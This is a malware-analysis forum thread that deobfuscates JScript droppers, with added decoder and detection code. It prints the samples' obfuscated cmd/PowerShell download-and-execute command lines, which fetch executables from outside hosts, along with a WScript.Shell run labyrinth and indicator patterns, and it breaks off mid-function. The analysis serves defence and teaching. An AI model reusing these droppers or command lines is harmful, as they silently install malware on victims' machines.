Malware Analysis: Script-based samples that run Powershell - From Nov 19, 2016 to March 06, 2017

DardiM

Update:

Added one new sample:

From https://malwaretips.com/threads/28-11-2016-20.65943/
thanks to @Der.Reisende

7.js

1) Main difference:

SEE THE FIRST POST FOR EXPLANATIONS

Obfuscated Command Line String:

In function olymip()

var uwnizjiq = "uznehu,uk,uja,ynuja,ebz,uja,rydwo,tj,yuja,ox,Xyuja,ox,fuja,ydwo,ne,uja,fyuja,ox,liuja,v,uznehu,uk,fuja,ydwo,ne,POhalx,uznehu,yuja,ox,halx,rhalx,boqyuja,ox,,halx,coxj,halx,yuja,ox,halx,LLuja,rydwo,tj,yuja,ox,halx,xhalx,yuja,ox,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,halx,piqyuja,ox,ynuja,ebz,z,yuja,ox,xyuja,ox,uznehu,uk,Usfis,ihalx,oNPhalx,Ohalx,lIuznehu,uk,yfuja,ydwo,ne,halx,bhalx,Yhalx,Phalx,ydwo,halx,boqyuja,ox,,boqyuja,ox,,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,piqyuja,ox,ynuja,ebz,z,halx,nhalx,ohalx,phalx,ROFhalx,ilyuja,ox,halx,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,fuja,ydwo,ne,piqyuja,ox,ynuja,ebz,z,halx,uznehu,halx,Inhalx,ynuja,ebz,Ouznehu,boqyuja,ox,,sfis,halx,yhalx,Lyuja,ox,fuja,ydwo,ne,halx,coxj,ihalx,ynuja,ebz,halx,ynuja,ebz,halx,yuja,ox,nfuja,ydwo,ne,vovtu,Nyuja,ox,uznehu,halx,piqyuja,ox,ynuja,ebz,z,halx,Obhalx,Jyuja,ox,uznehu,uk,sfis,fuja,ydwo,ne,fuja,ydwo,ne,halx,boqyuja,ox,,yboqyuja,ox,,sfis,yuja,ox,halx,uja,uja,rydwo,tj,nhalx,yuja,ox,sfis,halx,uja,rydwo,tj,halx,uznehu,yuja,ox,halx,bhalx,uznehu,uk,halx,lhalx,ihalx,yuja,ox,nsfis,usikm,uja,rydwo,tj,halx,ynuja,ebz,Ouznehu,nhalx,loydwo,ynuja,ebz,halx,Fihalx,Lyuja,ox,vovtu,yvybk,coxj,sfis,sfis,pibydwo,gkyuja,ox,,uja,fyuja,ox,liuja,v,uja,fyuja,ox,liuja,v,uznehu,uznehu,uznehu,uja,rydwo,tj,ydwo,lyuja,ox,qopyuja,ox,nydwo,uja,rydwo,tj,sfis,opuja,fyuja,ox,liuja,v,uboqyuja,ox,,yuja,ox,ruja,rydwo,tj,pcoxj,p?f=1uja,rydwo,tj,ynuja,ebz,ydwo,sfis,yvybk,,yvybk,etal,ydwo,ppynuja,ebz,ydwo,sfis,ydwo,etal,uja,rydwo,tj,yuja,ox,xyuja,ox,yvybk,usikm,ufjovuznehu,u,boqyuja,ox,,sfis,ydwo,Rhalx,sfis,piqyuja,ox,ynuja,ebz,z,pROhalx,uznehu,uk,yuja,ox,boqyuja,ox,,boqyuja,ox,,fuja,ydwo,ne,halx,etal,ydwo,pPynuja,ebz,ydwo,sfis,ydwo,etal,uja,rydwo,tj,yuja,ox,xyuja,ox,"​

Array of strings with patterns that will be replaced by chars in the obfuscated Command Line String:
var urcugeq = ['halx,', 'usikm,', "etal,", "uja,", 'ydwo,', "uznehu,", "coxj,", 'fmane,', 'ynmebz,', "mratj,", "wuk,", 'ymox,', 'ezmehc,', 'vovtu,', 'sfis,', "mfelimv,", "yvybk,", "boqe,", "ibagke,", 'piqedz,', 'ufjovwu,'];

Array of chars that will replace the patterns from izyme in the obfuscated Command Line String:
var regli = [
["ostirc", "guga", "^"][2],
["aqpidzafw", "teclu", ")"][2],
["oqobq", "fqiwy", '%'][2],
["elesqy", "fjemcatfo", "m"][2],
["qsajcih", "inaxz", 'a'][2],
["tliqywpo", "ulpiqim", "w"][2],
["huhmudf", "pbupmenu", 'h'][2],
["ysyvuc", "jjyve", " "][2],
["umzalo", "arwovz", "d"][2],
["onep", "ehesys", '.'][2],
["vocfe", "dwaczo", "c"][2],
["ovrym", "ksidijt", 'e'][2],
["jvagla", "olugir", "\,"][2],
["edwedsy", "ktopelxu", "("][2],
["orwynixz", "wbati", "t"][2],
["fqome", "wcypub", '/'][2],
["wipuc", "ixij", "'"][2],
["klytdy", "agmosfaxj", "s"][2],
["yxvokkuqs", "ykonipv", ':'][2],
["yxhuz", "esixdarj", "-"][2],
["nuxbu", "ufsyjpi", ';'][2]
];

Here is the main change from the previous sample:

=> each char is at index 2!

var regli = ["^", ")", "%", "m", "a", "w", "h", " ", "d", ".", "c", "e", ",", "(", "t", "/", "'", "s", ":", "-", ";"]
The script makes the same operations to get the deobfuscated command line:

We get:

"cmd.eXe /c PO^we^r^s^h^e^LL.e^x^e ^-execUti^oNP^O^lIcy ^b^Y^P^a^ss -^n^o^p^ROF^ile^ -^w^In^dOwst^y^Le ^hi^d^d^en (New^-^Ob^Ject ^syste^m.n^et^.^we^b^c^l^i^ent).^dOwn^load^Fi^Le('http ://www .aleqopena.top/user.php?f=1.dat','%appdata%\exe');staR^t-pRO^cess ^%apPdata%\exe"
That means:

"cmd.exe /c powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://www.aleqopena.top/user.php?f=1.dat','%appdata%\eXe');start-process %appdata%\eXe"

To find the run part: still the same method

- The command line deobfuscation is made by the function olymip()

=> a search with Notepad gives:

var ohduxa = olymip();

=> a search on ohduxa gives:

case 66:
oxoqmekq["ru" + "n"](ohduxa, elykfej);
break;
=> oxoqmekq["r" + "un"](ohduxa, elykfej);
var elykfej = 0;
ohduxa: command line
=> oxoqmekq["run"](commandLine, 0)
=> shell.run(commandLine, 0)

"cmd.exe /c powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http ://www .aleqopena.top/user.php?f=1.dat','%appdata%\eXe');start-process %appdata%\eXe"

runs powershell.exe:

-executionpolicy bypass

=> allows bypassing the execution policy
-noprofile
=> launches the script in an untouched environment (it doesn't load the Windows PowerShell profile)
-windowstyle hidden

=> hides the powershell window
(new-object system.net.webclient).downloadfile('http ://www .brownalet.top/id.php?f=1.dat' ,'%appdata%\eXe');

=> creates a .NET object and uses its downloadfile method to download the payload and save it on the HD

=> %appdata%\eXe

=> Example: C:\Users\DardiM\AppData\Roaming\eXe
start-process %appdata%\eXe"
=> runs the payload

Payload:

C:\Users\DardiM\AppData\Roaming\eXe

URL:

http ://www .aleqopena.top/user.php?f=1.dat
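As an added example (not code from the thread or from the 7.js sample), the following script replays the two-array substitution described above, so the command line can be decoded offline instead of by running the sample in wscript.exe. The urcugeq and regli tables are the sample's own, copied from the post; samplePrefix is the first tokens of the sample's uwnizjiq string; the "toy" table and string are constructed here to show that the replacement order matters.

```javascript
// Added example, not the sample's code: replays the pattern -> char
// substitution that olymip() performs, one pattern at a time, in array order.

// The pattern tokens and replacement chars as they appear in 7.js (the regli
// values are the index-2 entries of the sample's triplets).
const urcugeq = ['halx,', 'usikm,', 'etal,', 'uja,', 'ydwo,', 'uznehu,', 'coxj,',
  'fmane,', 'ynmebz,', 'mratj,', 'wuk,', 'ymox,', 'ezmehc,', 'vovtu,', 'sfis,',
  'mfelimv,', 'yvybk,', 'boqe,', 'ibagke,', 'piqedz,', 'ufjovwu,'];
const regli = ['^', ')', '%', 'm', 'a', 'w', 'h', ' ', 'd', '.', 'c', 'e', ',',
  '(', 't', '/', "'", 's', ':', '-', ';'];

// Replace every occurrence of patterns[i] with chars[i], strictly in array
// order. Order matters: an early replacement can create a token that only a
// later pattern matches (e.g. "fuja,ydwo,ne," -> "fmane," -> " ").
function substituteInOrder(obfuscated, patterns, chars) {
  if (patterns.length !== chars.length) throw new Error('table length mismatch');
  let s = obfuscated;
  for (let i = 0; i < patterns.length; i++) {
    s = s.split(patterns[i]).join(chars[i]);
  }
  return s;
}

// Same decoding, but keeps a trace of every pass that changed the string:
// useful when the output looks wrong and you need to see which pass did what.
function substituteWithTrace(obfuscated, patterns, chars) {
  const trace = [];
  let s = obfuscated;
  for (let i = 0; i < patterns.length; i++) {
    const before = s;
    s = s.split(patterns[i]).join(chars[i]);
    if (before !== s) trace.push({ pass: i, pattern: patterns[i], char: chars[i], result: s });
  }
  return { result: s, trace };
}

// The first tokens of the sample's uwnizjiq string (copied from the post).
const samplePrefix = 'uznehu,uk,uja,ynuja,ebz,uja,rydwo,tj,yuja,ox,Xyuja,ox,fuja,ydwo,ne,';

// A constructed table where decoding only works in array order: "ab,q," must
// first become "eq," before the third pattern can turn it into "c".
const toyPatterns = ['ab,', 'zz,', 'eq,', 'pp,'];
const toyChars = ['e', 'h', 'c', 'o'];
const toyObfuscated = 'ab,ab,q,zz,pp,';

console.log(JSON.stringify(substituteInOrder(samplePrefix, urcugeq, regli))); // "cmd.eXe "
console.log(substituteInOrder(toyObfuscated, toyPatterns, toyChars));         // echo
for (const step of substituteWithTrace(samplePrefix, urcugeq, regli).trace) {
  console.log(`pass ${step.pass}: ${JSON.stringify(step.pattern)} -> ${JSON.stringify(step.char)} => ${step.result}`);
}
```

Decoding the prefix reproduces the "cmd.eXe " start of the command line shown in the post without executing anything; the trace makes visible that "uznehu,uk," only becomes "c" after it has first been turned into "wuk," by an earlier pass, which is why a one-shot lookup table would not work on this sample.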
 

Svoll

What don't you understand?
- A big array of chars
- 2 small arrays with the same number of elements; each char from one array is changed by the char in the other array at the same position, and this new char replaces all the occurrences of the old string in the big array of strings... At the end we obtain the famous command line with cmd /c powershell etc. ... url ... payload ...

My Dearest Professor,

I love and admire how diligently and affectionately you wish to make everyone understand your analysis. I like @tim one explanation "Natural condition, the difficulty is inherent in the context"

The coding you are explaining is complex and very technical and you have taken that and done an awesome job of breaking it down as best as you can. Respect!
 

DardiM

Thanks.
Hard to know which part has to be explained more than the others.
That is why I am preparing a special Tuto, with some important parts often used in script-based malware to request the payload, record the data, save the data under a chosen path and name (after deobfuscation of the payload or not) and to run it.
This way, I will be more able to focus on the code (explaining certain functions, obfuscation and tricks in more detail, trying to teach something new each time, which will afterwards also be added to the Tuto).
 

DardiM

From https://malwaretips.com/threads/12-1-2017-7.67475/
Thanks to @silversurfer

https://www.reverse.it/sample/7c454...60220b83ee70f557d6d3babd561?environmentId=100

info.js

Why this sample?
Because an important (or not) modification has been made.


A big part of the code is there to make a kind of labyrinth:

- a lot of switch / case
- if
- functions
- var declarations
- useless data

Look once at the whole code:
Code:
var kahvizp = 0;
var ejorb = 12.2;
var ozebcysx = "ublejboprytn";
var elmabo = 234.4;

function jnujdily() {
    var yhywzysy = undefined;
    return yhywzysy;
}
var qsofyzkiha = typeof window == "undefined";

function zixceko() {
    var ygeh = 0;
    return ygeh;
}
var lorjyswepi = "run";
var aganh = 0;

function igyfsyvhonk() {
    return "71409";
}
function elowe() {
    var ovfiryqpe = undefined;
    return ovfiryqpe;
}
demjitevo = "81395";

function yscisgyppe() {
    var mwaka = null;
    return mwaka;
}
jsupniko = 'wobbacxazw';
akarnycanx = "682";

function ibvafopf() {
    return null;
}
var sxyxwawtape = 'peqecxe';
var ijralamixc = false;

function yderedhu() {
    return 5;
}
var acyrcy = "ezobu";

function sarep() {
    var tkyqolmidi = true;
    return tkyqolmidi;
}
function hlazugm() {
    return 29.2125;
}
var wvuqtel = '75145';
var yhuceslu = undefined;
var dzuwtevsidb = "idkorijdan";

function gilur() {
    return 4;
}
var amravcif = WScript;
var ihwyduq = null;

function oprid() {
    return null;
}
function tupy() {
    return null;
}
function owyqxyxer() {
    return 'orozysp';
}
function xenis() {
    var hedeq = undefined;
    return hedeq;
}
function wnexce() {
    return null;
}
function hpucicyfe() {
    return 19.24;
}
var dapim = 24.08;
switch (ihwyduq) {
case 15.337:
    var cohamp = 1;
    if (cohamp == true) {
        var ohzigva = 5;
    }
    if (yhuceslu === undefined) {
        var rkaphekp = 43;
        if (rkaphekp < 72) {
            var raradh = false;
            var vaqnos = 18;
            var fxepoqr = "26405";
            var zlazipuve = 96;
            var hwobmebyqo = zlazipuve + fxepoqr;
            hwobmebyqo = 23.5 + hwobmebyqo;
            var owuxtuj = 1;
        }
    }
    if (hlazugm() == 30.2125) {
        var himopw = undefined;
        if (himopw === 1) {
            var ktyhkezko = "36091";
            isommywbi = 132;
            var itenhoqvifx = ktyhkezko + isommywbi;
            itenhoqvifx = 4 + itenhoqvifx;
            var owfuvyd = null;
            var ypjebhipvo = null;
            var ysfyljefv = null;
            var rmidqibu = undefined;
            var ynelsol = 7.61;
        }
    }
    break;
case 385:
    var cohamp = 1;
    if (cohamp == true) {
        var ohzigva = 5;
    }
    if (yhuceslu === undefined) {
        var rkaphekp = 43;
        if (rkaphekp < 72) {
            var raradh = false;
            var vaqnos = 18;
            var fxepoqr = "26405";
            var zlazipuve = 96;
            var hwobmebyqo = zlazipuve + fxepoqr;
            hwobmebyqo = 23.5 + hwobmebyqo;
            var owuxtuj = 1;
        }
    }
    if (hlazugm() == 30.2125) {
        var himopw = undefined;
        if (himopw === 1) {
            var ktyhkezko = "36091";
            isommywbi = 132;
            var itenhoqvifx = ktyhkezko + isommywbi;
            itenhoqvifx = 4 + itenhoqvifx;
            var owfuvyd = null;
            var ypjebhipvo = null;
            var ysfyljefv = null;
            var rmidqibu = undefined;
            var ynelsol = 7.61;
        }
    }
    break;
case undefined:
    var cohamp = 1;
    if (cohamp == true) {
        var ohzigva = 5;
    }
    if (yhuceslu === undefined) {
        var rkaphekp = 43;
        if (rkaphekp < 72) {
            var raradh = false;
            var vaqnos = 18;
            var fxepoqr = "26405";
            var zlazipuve = 96;
            var hwobmebyqo = zlazipuve + fxepoqr;
            hwobmebyqo = 23.5 + hwobmebyqo;
            var owuxtuj = 1;
        }
    }
    if (hlazugm() == 30.2125) {
        var himopw = undefined;
        if (himopw === 1) {
            var ktyhkezko = "36091";
            isommywbi = 132;
            var itenhoqvifx = ktyhkezko + isommywbi;
            itenhoqvifx = 4 + itenhoqvifx;
            var owfuvyd = null;
            var ypjebhipvo = null;
            var ysfyljefv = null;
            var rmidqibu = undefined;
            var ynelsol = 7.61;
        }
    }
    break;
case null:
    switch (dapim) {
    case undefined:
        var fovpicbiku = undefined;
        if (fovpicbiku === undefined) {
            var pxafeh = null;
            var zatoxxa = undefined;
            var nnylnymdofle = '4470';
            var ukimbimqusc = "54752";
        }
        break;
    case null:
        var fovpicbiku = undefined;
        if (fovpicbiku === undefined) {
            var pxafeh = null;
            var zatoxxa = undefined;
            var nnylnymdofle = '4470';
            var ukimbimqusc = "54752";
        }
        break;
    case 24.08:
        if (wnexce() === 'yhandirbu') {
            var egoj = null;
            if (egoj == 1) {
                var zfitiwyk = false;
                if (zfitiwyk == false) {
                    var kijhepwura = 90;
                }
            }
        } else {
            var bredapzite = amravcif.CreateObject('WScript.Shell');
            if (oprid() == 542) {
                if (elmabo == 231.4) {
                    var ekilova = 273.773;
                    var xsetekcufy = undefined;
                    var ygtoqipcyvf = 1;
                    var aqelofo = "icyr";
                    esifxugi = 11.17;
                    var uzikobumk = aqelofo + esifxugi;
                    uzikobumk = uzikobumk + 23.695;
                }
            } else {
                switch (tupy()) {
                case 1:
                    if (typeof ibvafopf() == 'object') {
                        var zvadrivw = null;
                        var uqipjivd = "bolvulu";
                        var utnesotyk = 1;
                        ahjurdaja = demjitevo + utnesotyk;
                        ahjurdaja = 623 + ahjurdaja;
                        var icbymesab = undefined;
                        var syvzuzxenw = "pnezabab";
                        lylamo = 75;
                        var asroni = lylamo + syvzuzxenw;
                        asroni = 40.5 + asroni;
                    }
                    if (elowe() == undefined) {
                        var obmeszoso = "uhsapwaxtagl";
                        ocmozyvpas = 24.23;
                        var girololh = ocmozyvpas + obmeszoso;
                        girololh = girololh + 33;
                        var qzyjjuh = "ejynkivucj";
                    }
                    break;
                case null:
                    if (owyqxyxer() === "orozysp") {
                        var svuklov = "609";
                        svuklov = 566.03;
                        switch (xenis()) {
                        case "93731":
                            if (ijralamixc == false) {
                                var unyvpu = 'ofzerwyfez';
                                tcowfevpe = "visjeqpy";
                                var culcurok = 441;
                                kaffobsanqy = culcurok + tcowfevpe;
                                kaffobsanqy = "bokr" + kaffobsanqy;
                            }
                            if (jnujdily() == 1) {
                                var bolodbingy = "hqinpi";
                                var usahsemwywn = 670;
                                giwmuf = bolodbingy + usahsemwywn;
                                giwmuf = 72 + giwmuf;
                                var oteznyp = "8970";
                                var arhukmah = undefined;
                                var omejxir = null;
                                var tamjomhub = 10.352;
                                tamjomhub = 87 + tamjomhub;
                            }
                            var qkegopna = null;
                            if (qkegopna == 1) {
                                var idbuxjyd = 263;
                                var onvepe = true;
                                lcembufysu = "18368";
                                terovrys = 53;
                                var ipolbucy = lcembufysu + terovrys;
                                var orfiqiv = "33938";
                                var yvwovedq = 87.783;
                                var dpesylavr = yvwovedq + orfiqiv;
                                dpesylavr = dpesylavr + "ova";
                            }
                            if (kahvizp === false) {
                                var rsewuvav = "82747";
                                var ivzeqir = true;
                            }
                            break;
                        case true:
                            if (ijralamixc == false) {
                                var unyvpu = 'ofzerwyfez';
                                tcowfevpe = "visjeqpy";
                                var culcurok = 441;
                                kaffobsanqy = culcurok + tcowfevpe;
                                kaffobsanqy = "bokr" + kaffobsanqy;
                            }
                            if (jnujdily() == 1) {
                                var bolodbingy = "hqinpi";
                                var usahsemwywn = 670;
                                giwmuf = bolodbingy + usahsemwywn;
                                giwmuf = 72 + giwmuf;
                                var oteznyp = "8970";
                                var arhukmah = undefined;
                                var omejxir = null;
                                var tamjomhub = 10.352;
                                tamjomhub = 87 + tamjomhub;
                            }
                            var qkegopna = null;
                            if (qkegopna == 1) {
                                var idbuxjyd = 263;
                                var onvepe = true;
                                lcembufysu = "18368";
                                terovrys = 53;
                                var ipolbucy = lcembufysu + terovrys;
                                var orfiqiv = "33938";
                                var yvwovedq = 87.783;
                                var dpesylavr = yvwovedq + orfiqiv;
                                dpesylavr = dpesylavr + "ova";
                            }
                            if (kahvizp === false) {
                                var rsewuvav = "82747";
                                var ivzeqir = true;
                            }
                            break;
                        case '13676':
                            if (ijralamixc == false) {
                                var unyvpu = 'ofzerwyfez';
                                tcowfevpe = "visjeqpy";
                                var culcurok = 441;
                                kaffobsanqy = culcurok + tcowfevpe;
                                kaffobsanqy = "bokr" + kaffobsanqy;
                            }
                            if (jnujdily() == 1) {
                                var bolodbingy = "hqinpi";
                                var usahsemwywn = 670;
                                giwmuf = bolodbingy + usahsemwywn;
                                giwmuf = 72 + giwmuf;
                                var oteznyp = "8970";
                                var arhukmah = undefined;
                                var omejxir = null;
                                var tamjomhub = 10.352;
                                tamjomhub = 87 + tamjomhub;
                            }
                            var qkegopna = null;
                            if (qkegopna == 1) {
                                var idbuxjyd = 263;
                                var onvepe = true;
                                lcembufysu = "18368";
                                terovrys = 53;
                                var ipolbucy = lcembufysu + terovrys;
                                var orfiqiv = "33938";
                                var yvwovedq = 87.783;
                                var dpesylavr = yvwovedq + orfiqiv;
                                dpesylavr = dpesylavr + "ova";
                            }
                            if (kahvizp === false) {
                                var rsewuvav = "82747";
                                var ivzeqir = true;
                            }
                            break;
                        case undefined:
                            var takhovnyd = undefined;
                            if (typeof takhovnyd == 'undefined') {
                                if (qsofyzkiha) {
                                    var ovsut = "cmd.exe /c \"po" + "we" + "rs" + "he" + "ll  $eposj='^le(''ht';$qekos='^ope   Pr';$bzeda='^qfy.ex';$iwjumv='^ss    -Sc';$akisi='^ackand';$cedwaq='^.233.2';$iwadxa='^Set-Ex';$ketumq='^=($env';$casew='^ew-Obj';$bilat='^ocess;';$bpoqoj='^et.Web';$nadug='^e'');(N';$lmyde='^ss $pa';$awdipki='^th';$jysec='^client';$ohmywy='^02.181';$elopmy='^trace.';$sova='^path);';$yhap='^ect Sy';$tcapwi='^:temp+';$okxuwl='^42/.tr';$eraqy='^exe'',$';$opugy='^).Down';$dsawip='^    Start';$rulih='^nPolic';$ihcavo='^ecutio';$bikzo='^tp://2';$famyxs='^ $path';$odad='^''\afwa';$uloju='^y     Bypa';$ofafj='^stem.N';$tovju='^-Proce';$ycigbi='^loadFi'; Invoke-Expression ($iwadxa+$ihcavo+$rulih+$uloju+$iwjumv+$qekos+$bilat+$famyxs+$ketumq+$tcapwi+$odad+$bzeda+$nadug+$casew+$yhap+$ofafj+$bpoqoj+$jysec+$opugy+$ycigbi+$eposj+$bikzo+$ohmywy+$cedwaq+$okxuwl+$akisi+$elopmy+$eraqy+$sova+$dsawip+$tovju+$lmyde+$awdipki);\"";
                                  //  bredapzite[lorjyswepi](ovsut, aganh);
                                    var mfeccyxh = 25;
                                } else {
                                    var ybsyg = undefined;
                                    if (ybsyg == undefined) {
                                        var ocybutir = 'xbavuzguf';
                                        var acujin = 1.525;
                                        var itnufu = ocybutir + acujin;
                                        itnufu = 748.7836 + itnufu;
                                        var nvafanasgo = 'ubli';
                                        nvafanasgo = '23967';
                                    }
                                }
                                var ilucqi = "2053";
                                rnuflicock = 3.5;
                                fpuzzamcervi = ilucqi + rnuflicock;
                                fpuzzamcervi = fpuzzamcervi + 15.31;
                                var uzsozcovbek = 12.065;
                                uzsozcovbek = 107;
                            }
                            break;
                        case false:
                            if (ijralamixc == false) {
                                var unyvpu = 'ofzerwyfez';
                                tcowfevpe = "visjeqpy";
                                var culcurok = 441;
                                kaffobsanqy = culcurok + tcowfevpe;
                                kaffobsanqy = "bokr" + kaffobsanqy;
                            }
                            if (jnujdily() == 1) {
                                var bolodbingy = "hqinpi";
                                var usahsemwywn = 670;
                                giwmuf = bolodbingy + usahsemwywn;
                                giwmuf = 72 + giwmuf;
                                var oteznyp = "8970";
                                var arhukmah = undefined;
                                var omejxir = null;
                                var tamjomhub = 10.352;
                                tamjomhub = 87 + tamjomhub;
                            }
                            var qkegopna = null;
                            if (qkegopna == 1) {
                                var idbuxjyd = 263;
                                var onvepe = true;
                                lcembufysu = "18368";
                                terovrys = 53;
                                var ipolbucy = lcembufysu + terovrys;
                                var orfiqiv = "33938";
                                var yvwovedq = 87.783;
                                var dpesylavr = yvwovedq + orfiqiv;
                                dpesylavr = dpesylavr + "ova";
                            }
                            if (kahvizp === false) {
                                var rsewuvav = "82747";
                                var ivzeqir = true;
                            }
                            break;
                        }
                    }
                    break;
                }
                mzipafx = 28;
                var ewcaqavu = ozebcysx + mzipafx;
                ewcaqavu = ewcaqavu + 'cozagwoxu';
                var osornugu = 'rjyvyglob';
                var mkoqatb = 6.3168;
                var mdipahoz = osornugu + mkoqatb;
                var ovojte = undefined;
                var wikil = '61904';
                var osxivi = '11371';
                var wekivwahqu = 95;
                urxiqab = osxivi + wekivwahqu;
                urxiqab = "icovxywrib" + urxiqab;
                var owohuxk = "75098";
            }
            fywab = 467;
            var yxepquzi = fywab + jsupniko;
            yxepquzi = yxepquzi + '61461';
            var rasmann = 5;
            var suropeka = dzuwtevsidb + rasmann;
            suropeka = 633 + suropeka;
            var erovrixda = "4037";
        }
        break;
    }
    break;
}

I can tell you that only a few parts are really important.

The only aim of a lot of parts in this sample: to make a path to where the command line is run.
There are some tests, operations, function calls, etc., but all the results make the path followed always the same.
And a lot of parts are really useless.

We can easily find the only important part:

Looking for the word run:

=> lorjyswepi = "run";
=> aganh = 0;

we can find where these vars are used (a Find in Notepad++):

(1) var ovsut =
"cmd.exe /c \"po" + "we" + "rs" + "he" + "ll $eposj='^le(''ht';$qekos='^ope Pr';$bzeda='^qfy.ex';$iwjumv='^ss -Sc';$akisi='^ackand';$cedwaq='^.233.2';$iwadxa='^Set-Ex';$ketumq='^=($env';$casew='^ew-Obj';$bilat='^ocess;';$bpoqoj='^et.Web';$nadug='^e'');(N';$lmyde='^ss $pa';$awdipki='^th';$jysec='^client';$ohmywy='^02.181';$elopmy='^trace.';$sova='^path);';$yhap='^ect Sy';$tcapwi='^:temp+';$okxuwl='^42/.tr';$eraqy='^exe'',$';$opugy='^).Down';$dsawip='^ Start';$rulih='^nPolic';$ihcavo='^ecutio';$bikzo='^tp://2';$famyxs='^ $path';$odad='^''\afwa';$uloju='^y Bypa';$ofafj='^stem.N';$tovju='^-Proce';$ycigbi='^loadFi'; Invoke-Expression ($iwadxa+$ihcavo+$rulih+$uloju+$iwjumv+$qekos+$bilat+$famyxs+$ketumq+$tcapwi+$odad+$bzeda+$nadug+$casew+$yhap+$ofafj+$bpoqoj+$jysec+$opugy+$ycigbi+$eposj+$bikzo+$ohmywy+$cedwaq+$okxuwl+$akisi+$elopmy+$eraqy+$sova+$dsawip+$tovju+$lmyde+$awdipki);\"";
(2) bredapzite[lorjyswepi](ovsut, aganh);

=> shellobject["run"](cmd_line , 0);

var ovsut: obfuscated command line for the run function

=> The deobfuscation is no longer made in the js file itself, but once run by cmd.exe:

All the lines are equivalent to:

var lorjyswepi = "run";
var aganh = 0;
var amravcif = WScript;
var bredapzite = amravcif.CreateObject('WScript.Shell');
var ovsut = obfuscated_command_line
bredapzite[lorjyswepi](ovsut, aganh);

Then equivalent to:

( WScript.CreateObject('WScript.Shell'))["run"](obfuscated_command_line, 0)

447 lines to 1 line ...

Let's deobfuscate the string:

- Use powershell.exe

It's a creation of vars with the parts, and at the end, a puzzle put in the right order:
$NAME => parts of the puzzle

"cmd.exe /c \"powershell
$eposj='^le(''ht';
$qekos='^ope Pr';
$bzeda='^qfy.ex';
$iwjumv='^ss -Sc';
$akisi='^ackand';
$cedwaq='^.233.2';
$iwadxa='^Set-Ex';
$ketumq='^=($env';
$casew='^ew-Obj';
$bilat='^ocess;';
$bpoqoj='^et.Web';
$nadug='^e'');(N';
$lmyde='^ss $pa';
$awdipki='^th';
$jysec='^client';
$ohmywy='^02.181';
$elopmy='^trace.';
$sova='^path);';
$yhap='^ect Sy';
$tcapwi='^:temp+';
$okxuwl='^42/.tr';
$eraqy='^exe'',$';
$opugy='^).Down';
$dsawip='^ Start';
$rulih='^nPolic';
$ihcavo='^ecutio';
$bikzo='^tp://2';
$famyxs='^ $path';
$odad='^''afwa';
$uloju='^y Bypa';
$ofafj='^stem.N';
$tovju='^-Proce';
$ycigbi='^loadFi';
Invoke-Expression ($iwadxa+$ihcavo+$rulih+$uloju+$iwjumv+$qekos+$bilat+$famyxs+$ketumq+$tcapwi+$odad+$bzeda+$nadug+$casew+$yhap+$ofafj+$bpoqoj+$jysec+$opugy+$ycigbi+$eposj+$bikzo+$ohmywy+$cedwaq+$okxuwl+$akisi+$elopmy+$eraqy+$sova+$dsawip+$tovju+$lmyde+$awdipki);\""

=> Invoke-Expression(" ...CONTENT.... "); => evaluates the string

Replacing the parts:

'^Set-Ex^ecutio^nPolic^y Bypa'^ss -Sc^ope Pr^ocess;^ $path''^=($env^:temp+^"afwa^qfy.ex'^e");(N^ew-Obj^ect Sy^stem.N^et.Web^client^).Down^loadFi^le("ht^tp://2^02.181^.233.2^42/.tr^ackand^trace.^exe",$^path);^ Start^-Proce^ss $pa^th'

We can remove the ^ chars:

Powershell.exe
'Set-ExecutionPolicy Bypass -Scope Process;
$path''=($env:temp+"afwaqfy.exe");
(New-Object System.Net.Webclient).DownloadFile(
"http ://202.181.233.242/.trackandtrace.exe",
$path);
Start-Process $path'

-executionpolicy bypass
=> allows bypassing the execution policy
-noprofile

=> launches the script in an untouched environment (it doesn't load the Windows PowerShell profile)
-windowstyle hidden
=> hides the powershell window
(new-object system.net.webclient).downloadfile(URL ,PATH );
=> creates a .NET object and uses its downloadfile method to download the payload and save it on the HD
start-process PATH
=> runs the payload at PATH

Here:

=> downloads from URL to %TEMP%/afwaqfy.exe
=> runs the payload
(you can see in my previous post, on the same page, all the parts used by Powershell.exe in detail)
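The launch chain analysed in these posts (WScript.Shell run -> cmd.exe /c -> powershell.exe with ExecutionPolicy Bypass, NoProfile, WindowStyle Hidden, a WebClient DownloadFile and Start-Process) is also what a defender can key on. The following is an added example, not code from the thread: a small triage routine over constructed process-creation events. The first event reuses the caret-obfuscated command line from 7.js above (URL left defanged as in the post), the second is a made-up benign PowerShell launch, and the third is a shortened, made-up version of the $var='^part' puzzle so the limits of command-line matching are visible. The event field names (pid, parentImage, image, commandLine) are an assumption modelled on Sysmon process-creation records, not any product's schema.

```javascript
// Added example, not part of the thread: defender-side triage for the
// wscript.exe -> cmd.exe -> powershell.exe download-and-run chain.

// cmd.exe removes ^ escapes before the child process sees the line, so the
// detector must do the same or "PO^we^r^s^h^e^LL" never matches "powershell".
function normalizeCommandLine(cmd) {
  return cmd.replace(/\^/g, '').replace(/\s+/g, ' ').toLowerCase();
}

// Indicators tested against the normalized command line. Each one alone is
// common in admin scripts; it is the combination that is suspicious.
const INDICATORS = [
  { name: 'powershell-launch', re: /\bpowershell(\.exe)?\b/ },
  { name: 'executionpolicy-bypass', re: /-e\w*\s+bypass|set-executionpolicy\s+bypass/ },
  { name: 'noprofile', re: /-nop\w*/ },
  { name: 'hidden-window', re: /-w\w*\s+hidden/ },
  { name: 'webclient-download', re: /webclient\)\.download(file|string)/ },
  { name: 'invoke-expression', re: /\binvoke-expression\b|\biex\b/ },
  { name: 'start-process', re: /\bstart-process\b/ },
];

// wscript.exe / cscript.exe as the parent is the script-dropper signature.
function isScriptHost(image) {
  return /\\[wc]script\.exe$/i.test(image);
}

function analyzeEvent(ev) {
  const normalized = normalizeCommandLine(ev.commandLine);
  const hits = INDICATORS.filter(i => i.re.test(normalized)).map(i => i.name);
  let severity = 'none';
  if (hits.length >= 3) severity = isScriptHost(ev.parentImage) ? 'high' : 'medium';
  else if (hits.length > 0) severity = 'low';
  return { pid: ev.pid, severity, hits, normalized };
}

const RANK = { high: 3, medium: 2, low: 1, none: 0 };

// Every event that matched at least one indicator, most severe first.
function triage(events) {
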